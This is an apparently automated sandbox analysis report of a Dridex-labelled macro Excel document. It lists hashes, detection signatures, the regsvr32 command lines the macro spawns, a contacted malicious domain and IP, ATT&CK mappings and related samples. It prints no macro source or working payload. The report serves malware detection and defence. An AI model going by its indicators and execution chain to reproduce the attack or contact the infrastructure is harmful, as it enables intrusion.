Loading ...

Play interactive tourEdit tour

Analysis Report Dridex-06-bc1b.xlsm

Overview

General Information

Sample Name:Dridex-06-bc1b.xlsm
Analysis ID:344478
MD5:f72f88ebdf048fdfedf0aa3e298d9e71
SHA1:b8ea58415338bed65d4cd194ead6ac663ad71a6c
SHA256:78ccf25ecee02f759cefa6b1c29a00fb4ce64c000f7b9c04c1fc08e04d04bc1b

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 252 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2512 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\LO400F\PI909U\960. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2400 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\SD120E\EP146E\960. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2304 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\QP101F\TL941X\960. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\LO400F\PI909U\960., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\LO400F\PI909U\960., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 252, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\LO400F\PI909U\960., ProcessId: 2512

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: Dridex-06-bc1b.xlsmAvira: detected
Multi AV Scanner detection for domain / URLShow sources
Source: compagniamaestro.comVirustotal: Detection: 13%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Dridex-06-bc1b.xlsmVirustotal: Detection: 50%Perma Link
Source: Dridex-06-bc1b.xlsmReversingLabs: Detection: 58%

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 199.192.21.36:443 -> 192.168.2.22:49167 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exeJump to behavior
Source: global trafficDNS query: name: compagniamaestro.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 199.192.21.36:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 199.192.21.36:443
Source: Joe Sandbox ViewIP Address: 199.192.21.36 199.192.21.36
Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\841CAADE.emfJump to behavior
Source: unknownDNS traffic detected: queries for: compagniamaestro.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000003.00000002.2105763000.0000000001DB0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2106436897.0000000001C30000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2107554860.0000000001D70000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: 960.0.drString found in binary or memory: https://crbug.com/740629)
Source: 960.0.drString found in binary or memory: https://github.com/google/closure-compiler/issues/544
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownHTTPS traffic detected: 199.192.21.36:443 -> 192.168.2.22:49167 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Enable Macros Disable Macros Opening: x|sm.sheet,csv, Press ESC to cancel. a @1 iGi %10 m '00
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Foglio1, Function PagamentoDocumento, API Run("Auto_io22")Name: PagamentoDocumento
Source: VBA code instrumentationOLE, VBA macro: Module Foglio1, Function PagamentoDocumento, API Run("Auto_io22")Name: PagamentoDocumento
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Dridex-06-bc1b.xlsmInitial sample: CALL
Source: Dridex-06-bc1b.xlsmInitial sample: CALL
Source: Dridex-06-bc1b.xlsmInitial sample: CALL
Source: Dridex-06-bc1b.xlsmInitial sample: CALL
Source: Dridex-06-bc1b.xlsmOLE, VBA macro line: Private Sub pagoUno_Layout()
Source: VBA code instrumentationOLE, VBA macro: Module Foglio1, Function pagoUno_LayoutName: pagoUno_Layout
Source: Dridex-06-bc1b.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal92.expl.evad.winXLSM@7/16@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Dridex-06-bc1b.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD873.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: Dridex-06-bc1b.xlsmVirustotal: Detection: 50%
Source: Dridex-06-bc1b.xlsmReversingLabs: Detection: 58%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\LO400F\PI909U\960.
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\SD120E\EP146E\960.
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\QP101F\TL941X\960.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\LO400F\PI909U\960.Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\SD120E\EP146E\960.Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\QP101F\TL941X\960.Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Dridex-06-bc1b.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: Dridex-06-bc1b.xlsmInitial sample: OLE zip file path = xl/media/image3.png
Source: Dridex-06-bc1b.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Dridex-06-bc1b.xlsmInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting22NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Dridex-06-bc1b.xlsm51%VirustotalBrowse
Dridex-06-bc1b.xlsm5%MetadefenderBrowse
Dridex-06-bc1b.xlsm59%ReversingLabsDocument-Word.Trojan.Ursnif
Dridex-06-bc1b.xlsm100%AviraW2000M/Agent.1970033

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
compagniamaestro.com13%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://crbug.com/740629)0%Avira URL Cloudsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
compagniamaestro.com
199.192.21.36
truetrueunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://crbug.com/740629)960.0.drfalse
  • Avira URL Cloud: safe
unknown
https://github.com/google/closure-compiler/issues/544960.0.drfalse
    high
    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2105763000.0000000001DB0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2106436897.0000000001C30000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2107554860.0000000001D70000.00000002.00000001.sdmpfalse
    • Avira URL Cloud: safe
    low

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    199.192.21.36
    unknownUnited States
    22612NAMECHEAP-NETUStrue

    General Information

    Joe Sandbox Version:31.0.0 Emerald
    Analysis ID:344478
    Start date:26.01.2021
    Start time:16:15:51
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 5m 19s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:Dridex-06-bc1b.xlsm
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal92.expl.evad.winXLSM@7/16@1/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xlsm
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe
    • Excluded IPs from analysis (whitelisted): 192.35.177.64, 95.101.27.163, 95.101.27.142, 8.241.122.126, 8.248.149.254, 67.27.159.254, 67.27.158.254, 8.241.9.254
    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net
    • Report size getting too big, too many NtCreateFile calls found.
    • Report size getting too big, too many NtDeviceIoControlFile calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    199.192.21.36n830467925857.xlsmGet hashmaliciousBrowse
      n830467925857.xlsmGet hashmaliciousBrowse
        Fattura_25785.xlsmGet hashmaliciousBrowse
          Fattura_25785.xlsmGet hashmaliciousBrowse
            Fattura_20070.xlsmGet hashmaliciousBrowse
              Fattura_20070.xlsmGet hashmaliciousBrowse
                Fattura_26645.xlsmGet hashmaliciousBrowse
                  Fattura_26645.xlsmGet hashmaliciousBrowse

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    compagniamaestro.comn830467925857.xlsmGet hashmaliciousBrowse
                    • 199.192.21.36
                    n830467925857.xlsmGet hashmaliciousBrowse
                    • 199.192.21.36
                    Fattura_25785.xlsmGet hashmaliciousBrowse
                    • 199.192.21.36
                    Fattura_25785.xlsmGet hashmaliciousBrowse
                    • 199.192.21.36
                    Fattura_20070.xlsmGet hashmaliciousBrowse
                    • 199.192.21.36
                    Fattura_20070.xlsmGet hashmaliciousBrowse
                    • 199.192.21.36
                    Fattura_26645.xlsmGet hashmaliciousBrowse
                    • 199.192.21.36
                    Fattura_26645.xlsmGet hashmaliciousBrowse
                    • 199.192.21.36

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    NAMECHEAP-NETUSwinlog(1).exeGet hashmaliciousBrowse
                    • 198.54.117.216
                    Revise Bank Details_pdf.exeGet hashmaliciousBrowse
                    • 198.54.116.236
                    SecuriteInfo.com.BehavesLike.Win32.Generic.tz.exeGet hashmaliciousBrowse
                    • 198.187.31.7
                    SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exeGet hashmaliciousBrowse
                    • 198.187.31.7
                    Payment Swift Copy_USD 206,832,000.00.pdf.exeGet hashmaliciousBrowse
                    • 198.54.116.236
                    INGNhYonmgtGZ9Updf.exeGet hashmaliciousBrowse
                    • 198.54.117.244
                    DSksIiT85D.exeGet hashmaliciousBrowse
                    • 199.188.200.97
                    file.exeGet hashmaliciousBrowse
                    • 198.54.116.236
                    Tebling_Resortsac_FILE-HP38XM.htmGet hashmaliciousBrowse
                    • 104.219.248.112
                    file.exeGet hashmaliciousBrowse
                    • 198.54.116.236
                    RevisedPO.24488_pdf.exeGet hashmaliciousBrowse
                    • 198.54.117.215
                    74725794.exeGet hashmaliciousBrowse
                    • 198.54.122.60
                    SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exeGet hashmaliciousBrowse
                    • 198.54.117.212
                    ACH Funds Transferred.xlsGet hashmaliciousBrowse
                    • 199.188.200.124
                    ACH Funds Transferred.xlsGet hashmaliciousBrowse
                    • 199.188.200.124
                    BENVAV31BU.htmlGet hashmaliciousBrowse
                    • 63.250.38.8
                    roK1cuvuLG.exeGet hashmaliciousBrowse
                    • 199.188.206.63
                    DHL Details.exeGet hashmaliciousBrowse
                    • 198.54.126.165
                    SecuriteInfo.com.GenericRXNJ-EED6E27CA5FDA8.exeGet hashmaliciousBrowse
                    • 199.188.200.97
                    SecuriteInfo.com.BehavesLike.Win32.Generic.nm.exeGet hashmaliciousBrowse
                    • 199.188.200.97

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    7dcce5b76c8b17472d024758970a406bThe Mental Health Center.xlsxGet hashmaliciousBrowse
                    • 199.192.21.36
                    Remittance Advice 117301.xlsxGet hashmaliciousBrowse
                    • 199.192.21.36
                    SC-TR1167700000.xlsxGet hashmaliciousBrowse
                    • 199.192.21.36
                    PAYMENT INFO.xlsxGet hashmaliciousBrowse
                    • 199.192.21.36
                    case (348).xlsGet hashmaliciousBrowse
                    • 199.192.21.36
                    RefTreeAnalyserXL.xlamGet hashmaliciousBrowse
                    • 199.192.21.36
                    case (426).xlsGet hashmaliciousBrowse
                    • 199.192.21.36
                    case (250).xlsGet hashmaliciousBrowse
                    • 199.192.21.36
                    case (1447).xlsGet hashmaliciousBrowse
                    • 199.192.21.36
                    case (850).xlsGet hashmaliciousBrowse
                    • 199.192.21.36
                    SecuriteInfo.com.Heur.18472.xlsGet hashmaliciousBrowse
                    • 199.192.21.36
                    case (1543).xlsGet hashmaliciousBrowse
                    • 199.192.21.36
                    case_1581.xlsGet hashmaliciousBrowse
                    • 199.192.21.36
                    case (435).xlsGet hashmaliciousBrowse
                    • 199.192.21.36
                    INV-LASKUPDF2021.xlsxGet hashmaliciousBrowse
                    • 199.192.21.36
                    case (426).xlsGet hashmaliciousBrowse
                    • 199.192.21.36
                    case (61).xlsGet hashmaliciousBrowse
                    • 199.192.21.36
                    USD_ Payment Schedule.xlsGet hashmaliciousBrowse
                    • 199.192.21.36
                    8776139.docmGet hashmaliciousBrowse
                    • 199.192.21.36
                    8776139.docmGet hashmaliciousBrowse
                    • 199.192.21.36

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\LO400F\PI909U\960
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                    Category:dropped
                    Size (bytes):45017
                    Entropy (8bit):5.1653486867978575
                    Encrypted:false
                    SSDEEP:768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG
                    MD5:4B04126D788D6958C2C62DCE6FE37988
                    SHA1:1705C60E4BD29956E80BD34267F16F800037ED35
                    SHA-256:00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0
                    SHA-512:57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359
                    Malicious:true
                    Reputation:low
                    Preview: ..<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>.. <meta charset="utf-8">.. <title>Reported Unsafe Site: Navigation Blocked</title>.. <style>/* Copyright (C) Microsoft Corporation. All rights reserved... * Use of this source code is governed by a BSD-style license that can be.. * found in the LICENSE file. */....html, body {.. margin: 0;.. padding: 0;.. font-family: system-ui, sans-serif;.. /* Setting font-size to 62.5% so that 1 rem = 10px. */.. font-size: 62.5%;..}....#Wrapper {.. margin-left: auto;.. margin-right: auto;.. max-width: 600px;.. padding-top: 4.8rem;.. padding-left: 4.8rem;.. padding-right: 4.8rem;.. padding-bottom: 3.2rem;..}....#branding {.. font-size: 1.2rem;.. margin-top: 0.9rem;..}.....branding-ltr {.. text-align: right;..}.....branding-rtl {.. text-align: left;..}.....red {.. background-color: #b80000..}.....whiteFont {.. color: #ffffff !important;..}.....white-pushbutton {.. display: inline-block;.. font-size: 1.5rem;.
                    C:\QP101F\TL941X\960
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                    Category:dropped
                    Size (bytes):45017
                    Entropy (8bit):5.1653486867978575
                    Encrypted:false
                    SSDEEP:768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG
                    MD5:4B04126D788D6958C2C62DCE6FE37988
                    SHA1:1705C60E4BD29956E80BD34267F16F800037ED35
                    SHA-256:00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0
                    SHA-512:57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359
                    Malicious:false
                    Reputation:low
                    Preview: ..<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>.. <meta charset="utf-8">.. <title>Reported Unsafe Site: Navigation Blocked</title>.. <style>/* Copyright (C) Microsoft Corporation. All rights reserved... * Use of this source code is governed by a BSD-style license that can be.. * found in the LICENSE file. */....html, body {.. margin: 0;.. padding: 0;.. font-family: system-ui, sans-serif;.. /* Setting font-size to 62.5% so that 1 rem = 10px. */.. font-size: 62.5%;..}....#Wrapper {.. margin-left: auto;.. margin-right: auto;.. max-width: 600px;.. padding-top: 4.8rem;.. padding-left: 4.8rem;.. padding-right: 4.8rem;.. padding-bottom: 3.2rem;..}....#branding {.. font-size: 1.2rem;.. margin-top: 0.9rem;..}.....branding-ltr {.. text-align: right;..}.....branding-rtl {.. text-align: left;..}.....red {.. background-color: #b80000..}.....whiteFont {.. color: #ffffff !important;..}.....white-pushbutton {.. display: inline-block;.. font-size: 1.5rem;.
                    C:\SD120E\EP146E\960
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                    Category:dropped
                    Size (bytes):45017
                    Entropy (8bit):5.1653486867978575
                    Encrypted:false
                    SSDEEP:768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG
                    MD5:4B04126D788D6958C2C62DCE6FE37988
                    SHA1:1705C60E4BD29956E80BD34267F16F800037ED35
                    SHA-256:00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0
                    SHA-512:57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359
                    Malicious:false
                    Reputation:low
                    Preview: ..<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>.. <meta charset="utf-8">.. <title>Reported Unsafe Site: Navigation Blocked</title>.. <style>/* Copyright (C) Microsoft Corporation. All rights reserved... * Use of this source code is governed by a BSD-style license that can be.. * found in the LICENSE file. */....html, body {.. margin: 0;.. padding: 0;.. font-family: system-ui, sans-serif;.. /* Setting font-size to 62.5% so that 1 rem = 10px. */.. font-size: 62.5%;..}....#Wrapper {.. margin-left: auto;.. margin-right: auto;.. max-width: 600px;.. padding-top: 4.8rem;.. padding-left: 4.8rem;.. padding-right: 4.8rem;.. padding-bottom: 3.2rem;..}....#branding {.. font-size: 1.2rem;.. margin-top: 0.9rem;..}.....branding-ltr {.. text-align: right;..}.....branding-rtl {.. text-align: left;..}.....red {.. background-color: #b80000..}.....whiteFont {.. color: #ffffff !important;..}.....white-pushbutton {.. display: inline-block;.. font-size: 1.5rem;.
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                    Category:dropped
                    Size (bytes):58936
                    Entropy (8bit):7.994797855729196
                    Encrypted:true
                    SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                    MD5:E4F1E21910443409E81E5B55DC8DE774
                    SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                    SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                    SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                    Malicious:false
                    Reputation:high, very likely benign file
